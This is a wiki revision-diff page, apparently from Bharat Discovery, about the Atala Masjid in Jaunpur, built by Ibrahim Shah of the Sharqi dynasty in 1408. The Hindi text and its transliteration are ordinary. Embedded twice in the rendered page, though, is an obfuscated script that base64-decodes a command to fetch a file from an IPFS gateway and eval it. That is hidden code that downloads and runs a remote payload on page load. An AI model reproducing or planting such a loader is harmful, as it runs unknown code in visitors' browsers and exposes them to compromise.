Difference between revisions of "अटाला मस्जिद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:पर्यटन कोश (को हटा दिया गया हैं।))
Line 1: Line 1:
[[चित्र:Central-Pishtaq-Atala-Masjid-Jaunpur.jpg|thumb|केंद्रीय तोरण द्वार, अटाला मस्जिद, [[जौनपुर]]]]
+
[[चित्र:Central-Pishtaq-Atala-Masjid-Jaunpur.jpg|thumb|150px|केंद्रीय तोरण द्वार, अटाला मस्जिद, [[जौनपुर]]]]
*अटाला मस्जिद [[जौनपुर]] में शर्की राजवंश के इब्राहीमशाह (1402-38 ई.) ने 1408 ई. में बनवाई।  
+
'''अटाला मस्जिद''' [[उत्तर प्रदेश]] के [[जौनपुर]] में स्थित एक मस्जिद है।
*अटाला मस्जिद जौनपुर वास्तुकला का उत्तम नमूना है।  
+
*अटाला मस्जिद को शर्की राजवंश के इब्राहीमशाह (1402-38 ई.) ने 1408 ई. में बनवाई।  
 +
*अटाला मस्जिद जौनपुर [[वास्तुकला]] का उत्तम नमूना है।  
 
*मस्जिद की सबसे प्रमुख विशेषता इसके अग्रभाग में उठा हुआ प्रार्थना कक्ष है।  
 
*मस्जिद की सबसे प्रमुख विशेषता इसके अग्रभाग में उठा हुआ प्रार्थना कक्ष है।  
 
*इसमें मीनारें नहीं हैं जो सामान्य रूप से मस्जिदों में होती हैं।
 
*इसमें मीनारें नहीं हैं जो सामान्य रूप से मस्जिदों में होती हैं।
 
*मस्जिद के तीन तोरण द्वार हैं जिनमें सुंदर सजावट की गई है। बीच का तोरण द्वार सबसे ऊंचा है और इसकी लंबाई 23 मीटर है।
 
*मस्जिद के तीन तोरण द्वार हैं जिनमें सुंदर सजावट की गई है। बीच का तोरण द्वार सबसे ऊंचा है और इसकी लंबाई 23 मीटर है।
{{प्रचार}}
+
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 07:30, 15 November 2011

[[chitr:Central-Pishtaq-Atala-Masjid-Jaunpur.jpg|thumb|150px|keandriy toran dvar, atala masjid, jaunapur]] atala masjid uttar pradesh ke jaunapur mean sthit ek masjid hai.

  • atala masjid ko sharki rajavansh ke ibrahimashah (1402-38 ee.) ne 1408 ee. mean banavaee.
  • atala masjid jaunapur vastukala ka uttam namoona hai.
  • masjid ki sabase pramukh visheshata isake agrabhag mean utha hua prarthana kaksh hai.
  • isamean minarean nahian haian jo samany roop se masjidoan mean hoti haian.
  • masjid ke tin toran dvar haian jinamean suandar sajavat ki gee hai. bich ka toran dvar sabase ooancha hai aur isaki lanbaee 23 mitar hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>